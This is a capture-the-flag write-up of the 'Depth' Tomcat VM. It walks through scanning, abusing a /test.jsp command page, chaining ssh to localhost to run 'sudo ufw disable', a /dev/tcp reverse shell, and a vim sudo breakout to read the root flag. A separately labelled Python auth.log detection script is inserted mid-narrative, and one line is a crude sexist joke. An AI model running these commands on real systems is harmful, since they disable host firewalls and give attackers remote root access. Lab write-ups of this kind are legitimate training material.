This was a joint effort by myself and Leigh. Rather than our usual race to finish and be first to post, we collaborated, which, although mildly disconcerting, I think worked pretty well. His ramblings set me off down a path that turned out to be right, and he picked up on it when I was over-complicating things and generally being an idiot. As a side note, I'd personally suggest that this is a great VM for a more 'real world' scenario and pretty applicable to those of you who are practising for your OSCP qualification.

For those that wish to play along:

Let the games begin, release the arp-scan!

And then the obligatory nmap scan:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

and nikto on the web server:

root@kali:~# nikto -h 192.168.56.103:8080
- Nikto v2.1.6
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        8080
+ Start Time:         2017-12-01 10:13:05 (GMT0)
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1896 0x1506485738000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ OSVDB-3092: /test.jsp: This might be interesting...
+ /manager/status: Default Tomcat Server Status interface found

So, we have a few interesting things to take a look at here. I personally started with the PUT method being allowed. I had dreams of dropping a reverse shell onto the web server, and oh what a dream it was too, but it turned out to be a dead end: I didn't have authentication, so I was doing nothing of the sort! The same went for the DELETE method.

Which kinda only leaves the default install files (hmmm) and /test.jsp.

Test me, like one of your French whores.

This test page has some really odd characteristics, and I honestly spent far too long trying to figure out how this thing was functioning: you can copy (cp) files around, you can cat files, you can't echo into files, and due to the tabular nature of the output it always comes back in a weird format with not all of the information present (sometimes). By way of example, observe my efforts to output the tomcat users:

Ya sod!

I was getting increasingly frustrated at my own ineptitude when Leigh dropped the following on me:

Leigh: ssh bill@localhost ls -l /tmp

Leigh: Looks like ssh works in the restricted shell

Well this set me off down a path, and here’s how I articulated it back:

Firewall blocking everything we do right.... but we have server side doins! You were so close, ssh but not ssh out of the box, ssh local, but why I hear you ask? Cos you can chain commands, like a boss.

ssh bill@localhost sudo -l

Owner Group Size Filename

may run the b2r:

BOSCH! https://askubuntu.com/questions/724792/how-to-make-sure-that-firewall-is-off short read shorter

sudo ufw disable

and the reverse shell once the firewall was down:

ssh bill@localhost bash -i >& /dev/tcp/192.168.56.103/4444 0>&1

I was then a bit giddy because I had my low-priv shell, but it was something like 1am at this point, so I decided to pick it up again in the morning and left the following message:
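The chain above (ssh back into localhost from the web app's shell, sudo -l, then ufw disable) leaves a distinctive trail in auth.log. The following is an added example, not code from the original write-up or from the VM, that runs simple detection logic over constructed sample log lines; the hostname, users, PIDs and timestamps are made up, and the firewall command list is an assumption to extend for the tooling in use.

```python
import re

# Constructed sample auth.log lines (not from the page's VM), modelled on the chain
# in the write-up: ssh to localhost from the web app's shell, sudo -l, ufw disable,
# plus one ordinary admin session for contrast.
SAMPLE_AUTH_LOG = """\
Dec  1 10:42:11 b2r sshd[2143]: Accepted password for bill from 127.0.0.1 port 51522 ssh2
Dec  1 10:42:11 b2r sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=list
Dec  1 10:44:03 b2r sshd[2190]: Accepted password for bill from 127.0.0.1 port 51530 ssh2
Dec  1 10:44:03 b2r sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/usr/sbin/ufw disable
Dec  1 11:02:40 b2r sshd[2301]: Accepted publickey for admin from 192.168.56.10 port 40122 ssh2
Dec  1 11:03:15 b2r sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
"""

SSHD_ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+) port \d+")
SUDO_EVENT = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=\S+ ; USER=\S+ ; COMMAND=(?P<cmd>.*)$")

LOOPBACK = {"127.0.0.1", "::1"}
# Assumed list of commands that tear down host firewalling; extend for your tooling.
FIREWALL_DOWN = ("ufw disable", "iptables -F", "iptables -P INPUT ACCEPT", "nft flush ruleset")


def analyse_auth_log(text):
    """Return (rule, user, line) tuples for events matching the escape pattern."""
    findings = []
    for line in text.splitlines():
        ssh = SSHD_ACCEPTED.search(line)
        if ssh:
            # A login over ssh *from the same host* is the tell-tale of a local
            # service account escaping its restricted shell or an egress filter.
            if ssh.group("src") in LOOPBACK:
                findings.append(("ssh_from_loopback", ssh.group("user"), line))
            continue
        sudo = SUDO_EVENT.search(line)
        if not sudo:
            continue
        user, cmd = sudo.group("user"), sudo.group("cmd")
        # TTY=unknown means sudo ran non-interactively, e.g. chained after ssh.
        if sudo.group("tty") == "unknown":
            findings.append(("sudo_without_tty", user, line))
        if any(marker in cmd for marker in FIREWALL_DOWN):
            findings.append(("firewall_disabled", user, line))
    return findings


if __name__ == "__main__":
    for rule, user, line in analyse_auth_log(SAMPLE_AUTH_LOG):
        print(f"[{rule}] {user}: {line}")
```

On the sample above only bill's lines fire; the admin session from a real remote address with a pts TTY produces nothing.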

bill has full sudo rights, which is rather spicy; also /var/lib/tomcat8/webapps/ROOT, which is web root but also appears to be configured as root, so I dumped a quick php rev shell in, but that failed. I think we are looking at needing a jsp reverse shell to pop the root account.

I woke up to find Leigh had weighed in and was being sensible about things.

Sudo is ALL: ALL. Sudo breakout from VIM:

cd /root

cat flag

flag{WellThatWasEasy}

Which made me feel stupid, as I'd written a (much slated) piece about sudo breakout techniques, which can be seen here:

And that is how we popped Depth, and much fun it was too.